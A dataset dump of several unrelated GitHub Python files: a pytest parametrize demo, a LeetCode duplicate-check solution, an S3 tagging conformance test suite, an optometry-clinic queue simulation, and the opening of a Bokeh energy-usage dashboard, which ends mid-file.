{"seq_id":"37365643397","text":"import pytest\n\n\n@pytest.fixture()\ndef login(request):\n    x = request.param[\"x\"]\n    y = request.param[\"y\"]\n    if x==y:\n        return True\n    else:\n        return False\n\ntest_data = [{\"x\":1+1,\"y\":2},{\"x\":1+2,\"y\":3},{\"x\":1+4,\"y\":4}]\n\n@pytest.mark.parametrize(\"login\",test_data,indirect=True)\ndef test_login(login):\n    a=login\n    print(\"a=%s\"%a)\n\n\n","repo_name":"GStudent1/demo","sub_path":"testcase/study_parametrizing/test_parametrizing_second.py","file_name":"test_parametrizing_second.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"27769630611","text":"import unittest\n\n\"\"\"\nwrite down thoughts\n1. create a hashmap to store the index of last seen value\n\"\"\"\n\n\nclass Solution(object):\n    def containsNearbyDuplicate(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: bool\n        \"\"\"\n        hashmap = {}\n        for i, num in enumerate(nums):\n            # note: you should NOT use if not hashmap.get(), because 0 is considered falsy!!!\n            index = hashmap.get(num)\n            if index is None or i - index > k:\n                hashmap[num] = i\n            else:\n                return True\n        return False\n\n\nclass TestSolution(unittest.TestCase):\n    def test1(self):\n        self.assertEqual(True, Solution().containsNearbyDuplicate([1, 2, 3, 1], 3))\n\n    def test2(self):\n        self.assertEqual(False, Solution().containsNearbyDuplicate([1, 2, 3, 1, 2, 3], 2))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"iseryanxie/leetcode","sub_path":"test_219_contain_duplicate_ii.py","file_name":"test_219_contain_duplicate_ii.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"30581054451","text":"import base64\nimport datetime\nimport hashlib\nimport hmac\nimport json\nimport string\nfrom collections import OrderedDict\n\nimport pytest\nimport pytz\nimport requests\n\nfrom s3tests.tests import TestBaseClass, assert_raises, ClientError, get_client\n\n\nclass TestTaggingBase(TestBaseClass):\n\n    def make_random_string(self, size):\n        return self.gen_rand_string(size, chars=string.ascii_letters)\n\n\n@pytest.mark.sio\nclass TestObjectTagging(TestTaggingBase):\n\n    def test_get_obj_tagging(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify setting and getting object tags\n        \"\"\"\n        key = 'testputtags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        input_tag_set = self.create_simple_tag_set(2)\n        response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n    def test_get_obj_head_tagging(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify that head-object reports the tags that were set\n        \"\"\"\n        key = 'testputtags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        count = 2\n        input_tag_set = self.create_simple_tag_set(count)\n        response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n        response = client.head_object(Bucket=bucket_name, Key=key)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n        self.eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-tagging-count'], str(count))\n\n    def test_put_max_tags(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify the maximum number of tags allowed (10)\n        \"\"\"\n        key = 'testputmaxtags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        input_tag_set = self.create_simple_tag_set(10)\n        response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n    def test_put_excess_tags(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify that exceeding the maximum number of tags (11) fails\n        \"\"\"\n        key = 'testputmaxtags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        input_tag_set = self.create_simple_tag_set(11)\n        e = assert_raises(\n            ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        status, error_code = self.get_status_and_error_code(e.response)\n        self.eq(status, 400)\n        self.eq(error_code, 'InvalidTag')\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(len(response['TagSet']), 0)\n\n    def test_put_max_kvsize_tags(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify the maximum key/value lengths for a tag: key 128 chars, value 256 chars\n        \"\"\"\n        key = 'testputmaxkeysize'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        tag_set = []\n        for i in range(10):\n            k = self.make_random_string(128)\n            v = self.make_random_string(256)\n            tag_set.append({'Key': k, 'Value': v})\n\n        input_tag_set = {'TagSet': tag_set}\n\n        response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        for kv_pair in response['TagSet']:\n            self.eq((kv_pair in input_tag_set['TagSet']), True)\n\n    def test_put_excess_key_tags(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify that a tag key of 129 chars (value 256 chars) fails\n        \"\"\"\n        key = 'testputexcesskeytags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        tag_set = []\n        for i in range(10):\n            k = self.make_random_string(129)\n            v = self.make_random_string(256)\n            tag_set.append({'Key': k, 'Value': v})\n\n        input_tag_set = {'TagSet': tag_set}\n        e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        status, error_code = self.get_status_and_error_code(e.response)\n        self.eq(status, 400)\n        self.eq(error_code, 'InvalidTag')\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(len(response['TagSet']), 0)\n\n    def test_put_excess_val_tags(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify that a tag value of 257 chars (key 128 chars) fails\n        \"\"\"\n        key = 'testputexcesskeytags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        tag_set = []\n        for i in range(10):\n            k = self.make_random_string(128)\n            v = self.make_random_string(257)\n            tag_set.append({'Key': k, 'Value': v})\n\n        input_tag_set = {'TagSet': tag_set}\n        e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        status, error_code = self.get_status_and_error_code(e.response)\n        self.eq(status, 400)\n        self.eq(error_code, 'InvalidTag')\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(len(response['TagSet']), 0)\n\n    def test_put_modify_tags(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify modifying existing tags\n        \"\"\"\n        key = 'testputmodifytags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        tag_set = [{'Key': 'key', 'Value': 'val'}, {'Key': 'key2', 'Value': 'val2'}]\n\n        input_tag_set = {'TagSet': tag_set}\n\n        response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n        tag_set2 = [{'Key': 'key3', 'Value': 'val3'}]\n\n        input_tag_set2 = {'TagSet': tag_set2}\n\n        response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set2)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(response['TagSet'], input_tag_set2['TagSet'])\n\n    def test_put_delete_tags(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify deleting tags\n        \"\"\"\n        key = 'testputmodifytags'\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n        input_tag_set = self.create_simple_tag_set(2)\n        response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n        response = client.delete_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 204)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        self.eq(len(response['TagSet']), 0)\n\n    def test_post_object_tags_anonymous_request(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify setting object tags via a browser-based POST request\n        \"\"\"\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.get_new_bucket_name(s3cfg_global_unique)\n        url = self.get_post_url(s3cfg_global_unique, bucket_name)\n        client.create_bucket(ACL='public-read-write', Bucket=bucket_name)\n\n        key_name = \"foo.txt\"\n        input_tag_set = self.create_simple_tag_set(2)\n        # xml_input_tag_set is the same as input_tag_set in xml.\n        # There is not a simple way to change input_tag_set to xml like there is in the boto2 tests\n        xml_input_tag_set = \"<Tagging><TagSet><Tag><Key>0</Key><Value>0</Value></Tag><Tag><Key>1</Key><Value>1</Value></Tag></TagSet></Tagging>\"\n\n        payload = OrderedDict([\n            (\"key\", key_name),\n            (\"acl\", \"public-read\"),\n            (\"Content-Type\", \"text/plain\"),\n            (\"tagging\", xml_input_tag_set),\n            ('file', 'bar'),\n        ])\n\n        r = requests.post(url, files=payload, verify=s3cfg_global_unique.default_ssl_verify)\n        self.eq(r.status_code, 204)\n        response = client.get_object(Bucket=bucket_name, Key=key_name)\n        body = self.get_body(response)\n        self.eq(body, 'bar')\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key_name)\n        self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n    def test_post_object_tags_authenticated_request(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify\n        (operation='authenticated browser based upload via POST request')\n        (assertion='succeeds and returns written data')\n        \"\"\"\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.get_new_bucket(client, s3cfg_global_unique)\n\n        url = self.get_post_url(s3cfg_global_unique, bucket_name)\n        utc = pytz.utc\n        expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)\n\n        policy_document = {\"expiration\": expires.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n                           \"conditions\": [\n                               {\"bucket\": bucket_name},\n                               [\"starts-with\", \"$key\", \"foo\"],\n                               {\"acl\": \"private\"},\n                               [\"starts-with\", \"$Content-Type\", \"text/plain\"],\n                               [\"content-length-range\", 0, 1024],\n                               [\"starts-with\", \"$tagging\", \"\"]\n                           ]}\n\n        # xml_input_tag_set is the same as `input_tag_set = self.create_simple_tag_set(2)` in xml\n        # There is not a simple way to change input_tag_set to xml like there is in the boto2 tests\n        xml_input_tag_set = \"<Tagging><TagSet><Tag><Key>0</Key><Value>0</Value></Tag><Tag><Key>1</Key><Value>1</Value></Tag></TagSet></Tagging>\"\n\n        json_policy_document = json.JSONEncoder().encode(policy_document)\n        bytes_json_policy_document = bytes(json_policy_document, 'utf-8')\n        policy = base64.b64encode(bytes_json_policy_document)\n        aws_secret_access_key = s3cfg_global_unique.main_secret_key\n        aws_access_key_id = s3cfg_global_unique.main_access_key\n\n        signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())\n\n        payload = OrderedDict([\n            (\"key\", \"foo.txt\"),\n            (\"AWSAccessKeyId\", aws_access_key_id),\n            (\"acl\", \"private\"), (\"signature\", signature), (\"policy\", policy),\n            (\"tagging\", xml_input_tag_set),\n            (\"Content-Type\", \"text/plain\"),\n            ('file', 'bar')])\n\n        r = requests.post(url, files=payload, verify=s3cfg_global_unique.default_ssl_verify)\n        self.eq(r.status_code, 204)\n        response = client.get_object(Bucket=bucket_name, Key='foo.txt')\n        body = self.get_body(response)\n        self.eq(body, 'bar')\n\n    def test_put_obj_with_tags(self, s3cfg_global_unique):\n        \"\"\"\n        (operation='Test PutObj with tagging headers')\n        (assertion='success')\n        \"\"\"\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.get_new_bucket(client, s3cfg_global_unique)\n        key = 'testtagobj1'\n        data = 'A' * 100\n\n        tag_set = [{'Key': 'bar', 'Value': ''}, {'Key': 'foo', 'Value': 'bar'}]\n\n        put_obj_tag_headers = {\n            'x-amz-tagging': 'foo=bar&bar'\n        }\n\n        lf = (lambda **kwargs: kwargs['params']['headers'].update(put_obj_tag_headers))\n        client.meta.events.register('before-call.s3.PutObject', lf)\n\n        client.put_object(Bucket=bucket_name, Key=key, Body=data)\n        response = client.get_object(Bucket=bucket_name, Key=key)\n        body = self.get_body(response)\n        self.eq(body, data)\n\n        response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n        response_tag_set = response['TagSet']\n        self.eq(response_tag_set, tag_set)\n\n\n@pytest.mark.sio\nclass TestBucketTagging(TestTaggingBase):\n\n    @pytest.mark.fails_on_sio\n    @pytest.mark.xfail(reason=\"Expected: when no bucket tags have been set, getting the tags returns a NoSuchTagSet error\", run=True, strict=True)\n    @pytest.mark.merge  # merge PR: #464\n    def test_set_bucket_tagging(self, s3cfg_global_unique):\n        \"\"\"\n        Test: verify setting bucket tags\n        \"\"\"\n        client = get_client(s3cfg_global_unique)\n        bucket_name = self.get_new_bucket(client, s3cfg_global_unique)\n\n        e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name)  # won't raise ClientError\n        status, error_code = self.get_status_and_error_code(e.response)\n        self.eq(status, 404)\n\n        # https://github.com/ceph/s3-tests/commit/5b08b26453d8362c87a496b0a9cd448a6c331ddf\n        self.eq(error_code, 'NoSuchTagSet')\n\n        tags = {\n            'TagSet': [\n                {\n                    'Key': 'Hello',\n                    'Value': 'World'\n                },\n            ]\n        }\n        client.put_bucket_tagging(Bucket=bucket_name, Tagging=tags)\n\n        response = client.get_bucket_tagging(Bucket=bucket_name)\n        self.eq(len(response['TagSet']), 1)\n        self.eq(response['TagSet'][0]['Key'], 'Hello')\n        self.eq(response['TagSet'][0]['Value'], 'World')\n\n        response = client.delete_bucket_tagging(Bucket=bucket_name)\n        self.eq(response['ResponseMetadata']['HTTPStatusCode'], 204)\n\n        e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name)\n        status, error_code = self.get_status_and_error_code(e.response)\n        self.eq(status, 404)\n        self.eq(error_code, 'NoSuchTagSet')\n","repo_name":"sine-io/s3tests-sineio","sub_path":"py3-s3tests/tests/test_s3_tagging_v.py","file_name":"test_s3_tagging_v.py","file_ext":"py","file_size_in_byte":14906,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"}
{"seq_id":"9305532344","text":"from collections import deque, Counter\nfrom math import sqrt\nfrom random import random, seed\nfrom numpy import mean, arange, array, std\nfrom matplotlib import pyplot as plt\nfrom scipy import stats\n\n# seed(10)\n\n# A1,A2,A3,W1,D1,D2,D3,D4,D5,D6, H\n\n\n\nclass BasicModel:\n    def __init__(self, prob_to_doc=0.5, prob_emergency=0.04, mean_doc_arr_time=1, schedule=[]):\n        self.state = [0 for i in range(0, 11)]\n        self.schedule = schedule\n        self.t_max = 50\n        self.time = 0\n        self.W1 = 3\n        self.NOPTS = 2  # number of optometrists\n        self.distribution = stats.geom(1/mean_doc_arr_time)\n\n        # Visitor probabilities\n        self.prob_1 = 0.5  # probability that 1 person enters building\n        self.prob_2 = 0.2  # probability that 2 people enter the building\n        self.prob_emergency = prob_emergency  # probability of having an emergency\n        # the probability that somebody has to go to the doctor after visiting one of the assistants\n        self.prob_to_doc = prob_to_doc\n\n        self.prob_skipsA2 = 0.5\n\n        self.prob_skipsO2n = 0.5\n\n        # Emergency state\n        self.nr_emergencies = 0\n\n    def reset_state(self):\n        self.state = [0 for i in range(0, 11)]\n\n    def skipO2n(self, li: list, fromIndex):\n        \"\"\"\n        This is a function to shorten the code in the 'moveOPeople' function.\n        It determines if a person can skip the O2n state and can skip to the O_(2n+1) state.\n        \"\"\"\n        for _ in range(li[fromIndex]):\n            skipO = random() < self.prob_skipsO2n\n            if skipO:\n                li[fromIndex + 2] += 1\n            else:\n                li[fromIndex + 1] += 1\n\n        return li\n\n    def moveOPeople(self, li: list):\n        \"\"\"\n        Determines what happens to the people who are at the optometrist when 5 minutes pass.\n        \"\"\"\n        busyOpts = sum(li[self.W1+1:-2])\n        freeOpts = self.NOPTS - busyOpts\n\n        li[10] += li[9]\n        li[9] = 0\n\n        li = self.skipO2n(li, 8)\n        li[8] = 0\n\n        li[8] += li[7]\n        li[7] = 0\n\n        li = self.skipO2n(li, 6)\n        li[6] = 0\n\n        li[6] += li[5]\n        li[5] = 0\n\n        li = self.skipO2n(li, 4)\n        li[4] = 0\n\n        # # Add the number of free optometrists to O1\n        toAdd = min(freeOpts, li[3])\n        li[4] += toAdd\n        li[3] -= toAdd\n\n        return li\n\n    def moveAPeople(self, li: list):\n        \"\"\"\n        Determines what happens to people who are at one of the assistants.\n\n        We assume that the waiting room and the optometrists have already been handled.\n        The queue starts moving at the front (aka A3 moves first)\n        \"\"\"\n\n        # A3 moves to W1 or H\n        for _ in range(li[2]):\n            to_doc = random() < self.prob_to_doc\n            if to_doc:\n                li[3] += 1\n            else:\n                li[-1] += 1  # here they go home already\n        li[2] = 0\n\n        # A2 to A3\n        li[2] += li[1]\n        li[1] = 0\n\n        # from A1 to A2 or A3\n        for _ in range(li[0]):\n            skipA4 
= random() < self.prob_skipsA2\n if skipA4:\n li[2] += 1\n else:\n li[1] += 1\n li[0] = 0\n\n return li\n\n def visitor(self):\n if len(self.schedule)>0 and self.time <= self.t_max:\n people_to_add = self.schedule[self.time]\n else:\n r = random()\n if 0 < r <= self.prob_1:\n # Add one person\n people_to_add = 1\n\n elif self.prob_1 < r <= self.prob_1 + self.prob_2:\n people_to_add = 2\n else:\n people_to_add = 0\n self.state[0] = self.state[0] + people_to_add\n\n def check_emergency(self):\n\n if random() <= self.prob_emergency:\n # print(\"emergency\")\n self.state[self.W1] += 1\n self.nr_emergencies += 1\n\n def round(self):\n \"\"\"\n 10 minutes pass\n \"\"\"\n self.check_emergency()\n self.state = self.moveOPeople(self.state)\n self.state = self.moveAPeople(self.state)\n self.visitor()\n # print(self.state)\n\n def run(self):\n \"\"\"\n Run one simulation\n \"\"\"\n # Reset variables for next run\n self.reset_state()\n self.nr_emergencies = 0\n self.NOPTS = 1\n nr_waiting_patients = deque()\n arr_time = self.distribution.rvs()\n\n for t in range(self.t_max):\n self.time = t\n if t == arr_time:\n self.NOPTS += 1\n self.round()\n nr_waiting_patients.append(self.state[self.W1])\n # print(nr_waiting_patients)\n\n max_wait = max(nr_waiting_patients)\n mean_wait = mean(nr_waiting_patients)\n throughput = self.state[-1] / (self.t_max * 10 * mean_wait + 1)\n\n wait_counter = Counter(nr_waiting_patients)\n\n print(\"------- last simulation summary -------\")\n print(f\"Throughput: {throughput}\" )\n print(f\"mean number of people waiting: {mean_wait}\")\n print(f\"number of emergencies: {self.nr_emergencies}\")\n print()\n\n return self.schedule, throughput, wait_counter, max_wait, mean_wait\n\n def run_multiple(self, nr_runs):\n\n sum_counter = [0 for i in range(2*self.t_max)]\n sum2_counter = [0 for i in range(2*self.t_max)]\n mean_wait_times = deque()\n halfwidth_wait_times = deque()\n avarage_wait_times = deque()\n max_wait_time = 0\n for _ in range(nr_runs):\n schedule, throughput, wait_counter, max_wait, mean_wait = self.run()\n for c in wait_counter.items():\n sum_counter[c[0]] += c[1]\n sum2_counter[c[0]] += c[1]**2\n if max_wait > max_wait_time:\n max_wait_time = max_wait\n avarage_wait_times.append(mean_wait)\n print(sum_counter)\n print(sum2_counter)\n\n # CI for mean value\n mean_total = mean(avarage_wait_times)\n std_total = std(avarage_wait_times)\n halfwidth = 1.96*std_total/sqrt(nr_runs)\n ci_mean = (mean_total-halfwidth, mean_total+halfwidth)\n\n # determining mean and variances of each value of W\n for i in range(max_wait_time+1):\n mean_x = sum_counter[i] / (self.t_max*nr_runs)\n var_x = sum2_counter[i] / (self.t_max*nr_runs) - mean_x**2\n halfwidth_x = 1.96*sqrt(var_x / nr_runs)\n mean_wait_times.append(mean_x)\n halfwidth_wait_times.append(halfwidth_x)\n\n return array(mean_wait_times), array(halfwidth_wait_times), ci_mean\n\n\ndef plot_results(nr_runs):\n schedule = 75*[0]+25*[2]\n model = BasicModel(0.5, 0, schedule=schedule)\n means, halfwidth, average = model.run_multiple(nr_runs)\n plt.figure()\n labels = arange(len(means))\n plt.bar(labels, means, width=0.5, yerr=halfwidth)\n plt.show()\n\n\ndef plot_multiple(nr_runs):\n schedule1 = [2, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 2, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 2, 1, 1, 0, 0, 2, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1]\n schedule2 = 50*[1,0]\n model1 = 
BasicModel(0.5, 0.02)\n model2 = BasicModel(0.5, 0.02, 5)\n model3 = BasicModel(0.5, 0.02, 10)\n y1, dy1, E_y1 = model1.run_multiple(nr_runs)\n y2, dy2, E_y2 = model2.run_multiple(nr_runs)\n y3, dy3, E_y3 = model3.run_multiple(nr_runs)\n print(E_y1)\n print(E_y2)\n print(E_y3)\n fig, ax = plt.subplots(figsize=(12, 6))\n length = min([len(y1), len(y2), len(y3), 15])\n labels = arange(length)\n w = 0.3\n ax.bar(labels - w, y1[:length], width=w, yerr=dy1[:length], label='basic')\n ax.bar(labels, y2[:length], width=w, yerr=dy2[:length], label='with emergencies')\n ax.bar(labels + w, y3[:length], width=w, yerr=dy3[:length], label='with doctor to late')\n plt.xlabel(\"Number of patients in W\")\n plt.ylabel(\"Probability\")\n plt.title(\"Distribution of number of patient in the waiting room\")\n plt.legend()\n plt.show()\n\n\nplot_multiple(10000)\n\nif __name__ == \"__main__\":\n # manySimulations(numberOfSimulations=1000)\n print()","repo_name":"JWapstra/2WB20Model","sub_path":"10minModel.py","file_name":"10minModel.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22178548936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 12 19:27:56 2019\n\n@author: wouternieuwerth\n\"\"\"\n\nfrom bokeh.plotting import figure\nfrom bokeh.models import RadioButtonGroup, Panel, ColumnDataSource, LinearColorMapper\nfrom bokeh.models.widgets import DatePicker\nfrom bokeh.layouts import gridplot\nfrom bokeh.palettes import inferno\nimport numpy as np\nimport pandas as pd\nimport datetime\nfrom math import floor\nfrom pytz import timezone\nfrom datetime import date\n\nTOOLS = \"hover,save,pan,box_zoom,reset,wheel_zoom\"\n\npalette = inferno(25)\ncolor_mapper = LinearColorMapper(palette=palette)\n\n# standaardwaarden definieren:\nusageType = 'gastotalusage'\nstart = datetime.date(2017,1,1)\nstop = datetime.date.today()\n\n#------------------------------------------------------------------------------\n# accept a dataframe, remove outliers, return cleaned data in a new dataframe\n# see http://www.itl.nist.gov/div898/handbook/prc/section1/prc16.htm\n#------------------------------------------------------------------------------\ndef remove_outlier(df_in, col_name):\n \"\"\"accept a dataframe, remove outliers, return cleaned data in a new dataframe\"\"\"\n q1 = df_in[col_name].quantile(0.25)\n q3 = df_in[col_name].quantile(0.75)\n iqr = q3-q1 #Interquartile range\n fence_low = q1-1.5*iqr\n fence_high = q3+1.5*iqr\n df_out = df_in.loc[(df_in[col_name] > fence_low) & (df_in[col_name] < fence_high)]\n return df_out\n\ndef barchart_datepicker(df):\n \n def make_dataset(df, usageType='gastotalusage', start=datetime.date(2015,1,1), stop=datetime.date.today()):\n \n if type(start) == str:\n start = datetime.datetime.strptime(start, '%Y-%m-%d').date()\n if type(stop) == str:\n stop = datetime.datetime.strptime(stop, '%Y-%m-%d').date()\n \n start_milliseconds = ((start - datetime.date(1970,1,1)).total_seconds() * 1000)\n stop_milliseconds = ((stop - datetime.date(1970,1,1)).total_seconds() * 1000) + (86400000-1) # Plus 1 dag minus - milliseconde = einde van die dag\n \n if usageType == 'powertotalusage': # select both tariff1totalusage and tariff2totalusage\n \n df_verwerkt1 = df.loc[(df['attributeName'] == 'tariff1totalusage') & (df['time'] >= start_milliseconds) & (df['time'] <= stop_milliseconds)]\n df_verwerkt1 = df_verwerkt1.sort_values('time')\n df_verwerkt1 = 
df_verwerkt1.replace(0,np.NaN)\n df_verwerkt1 = df_verwerkt1.fillna(method='ffill')\n df_verwerkt1 = df_verwerkt1.fillna(method='bfill') # nodig om eerste rij te fixen.\n df_verwerkt1['time'] = pd.to_datetime(df_verwerkt1['time'], unit='ms', utc=True)\n df_verwerkt1['time'] = df_verwerkt1['time'].apply(lambda x: x.astimezone(timezone('Europe/Amsterdam')))\n # df_verwerkt1['hour'] = df_verwerkt1['time'].dt.hour\n df_verwerkt1['minutes'] = (df_verwerkt1['time'].dt.hour * 60) + df_verwerkt1['time'].dt.minute\n # df_verwerkt1['dayofweek'] = df_verwerkt1['time'].dt.dayofweek\n df_verwerkt1['difference'] = df_verwerkt1['value'].diff()\n df_verwerkt1['difference'] = df_verwerkt1['difference'].fillna(0)\n df_verwerkt1[df_verwerkt1['difference'] > 1000] = 0 # sprong naar Nederhoven uitfilteren\n df_verwerkt1 = df_verwerkt1[df_verwerkt1['difference'] > 0]\n \n # df_verwerkt1 = remove_outlier(df_verwerkt1, 'difference')\n \n df_verwerkt2 = df.loc[(df['attributeName'] == 'tariff2totalusage') & (df['time'] >= start_milliseconds) & (df['time'] <= stop_milliseconds)]\n df_verwerkt2 = df_verwerkt2.sort_values('time')\n df_verwerkt2 = df_verwerkt2.replace(0,np.NaN)\n df_verwerkt2 = df_verwerkt2.fillna(method='ffill')\n df_verwerkt2 = df_verwerkt2.fillna(method='bfill') # nodig om eerste rij te fixen.\n df_verwerkt2['time'] = pd.to_datetime(df_verwerkt2['time'], unit='ms', utc=True)\n df_verwerkt2['time'] = df_verwerkt2['time'].apply(lambda x: x.astimezone(timezone('Europe/Amsterdam')))\n # df_verwerkt2['hour'] = df_verwerkt2['time'].dt.hour\n df_verwerkt2['minutes'] = (df_verwerkt2['time'].dt.hour * 60) + df_verwerkt2['time'].dt.minute\n # df_verwerkt2['dayofweek'] = df_verwerkt2['time'].dt.dayofweek\n df_verwerkt2['difference'] = df_verwerkt2['value'].diff()\n df_verwerkt2['difference'] = df_verwerkt2['difference'].fillna(0)\n df_verwerkt2[df_verwerkt2['difference'] > 1000] = 0 # sprong naar Nederhoven uitfilteren\n df_verwerkt2 = df_verwerkt2[df_verwerkt2['difference'] > 0]\n \n # df_verwerkt2 = remove_outlier(df_verwerkt2, 'difference')\n \n df_verwerkt = pd.concat([df_verwerkt1, df_verwerkt2], ignore_index=True)\n \n groupby = df_verwerkt.groupby('minutes').sum()\n \n else:\n df_verwerkt = df.loc[(df['attributeName'] == usageType) & (df['time'] >= start_milliseconds) & (df['time'] <= stop_milliseconds)]\n df_verwerkt = df_verwerkt.sort_values('time')\n df_verwerkt = df_verwerkt.replace(0,np.NaN)\n df_verwerkt = df_verwerkt.fillna(method='ffill')\n df_verwerkt = df_verwerkt.fillna(method='bfill') # nodig om eerste rij te fixen.\n df_verwerkt['time'] = pd.to_datetime(df_verwerkt['time'], unit='ms', utc=True)\n df_verwerkt['time'] = df_verwerkt['time'].apply(lambda x: x.astimezone(timezone('Europe/Amsterdam')))\n # df_verwerkt['hour'] = df_verwerkt['time'].dt.hour\n df_verwerkt['minutes'] = (df_verwerkt['time'].dt.hour * 60) + df_verwerkt['time'].dt.minute\n # df_verwerkt['dayofweek'] = df_verwerkt['time'].dt.dayofweek\n df_verwerkt['difference'] = df_verwerkt['value'].diff()\n df_verwerkt['difference'] = df_verwerkt['difference'].fillna(0)\n df_verwerkt[df_verwerkt['difference'] > 1000] = 0 # sprong naar Nederhoven uitfilteren\n df_verwerkt = df_verwerkt[df_verwerkt['difference'] > 0]\n \n # df_verwerkt = remove_outlier(df_verwerkt, 'difference')\n \n groupby = df_verwerkt.groupby('minutes').sum()\n \n print('startdatum zoals verwerkt: ' + str(start))\n print('einddatum zoals verwerkt: ' + str(stop))\n \n return ColumnDataSource(data=groupby)\n \n def make_plot(src):\n \n # Deze regel maakt een dict met 
